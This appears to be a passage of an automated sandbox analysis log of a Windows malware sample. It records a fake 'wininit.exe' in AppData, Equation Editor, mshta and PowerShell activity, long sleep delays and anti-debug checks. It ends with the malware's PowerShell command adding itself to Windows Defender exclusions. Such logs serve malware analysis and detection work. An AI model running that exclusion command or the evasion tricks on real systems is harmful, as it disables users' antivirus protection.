Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 2D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 20E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 2D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 59A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 5710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 69A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Memory allocated: 79A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1259	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3238	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1604	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3968	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1303
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2543

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dll

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3772	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 3860	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4008	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076	Thread sleep count: 1604 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076	Thread sleep count: 3968 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 2180	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2692	Thread sleep count: 1303 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2692	Thread sleep count: 2543 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2216	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 2456	Thread sleep time: -780000s >= -30000s
Source: C:\Windows\System32\verclsid.exe TID: 3188	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\verclsid.exe TID: 3188	Thread sleep time: -60000s >= -30000s

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

18_2_00403D74

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wininit.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\wininit.exe	Thread delayed: delay time: 60000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-637
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-651
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_8-640

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 8_2_035F05C8 mov edx, dword ptr fs:[00000030h]		8_2_035F05C8
Source: C:\Users\user\AppData\Roaming\wininit.exe	Code function: 18_2_0040317B mov eax, dword ptr fs:[00000030h]		18_2_0040317B

Source: C:\Users\user\AppData\Roaming\wininit.exe

Code function: 18_2_00402B7C GetProcessHeap,RtlAllocateHeap,

18_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\wininit.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\wininit.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\wininit.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
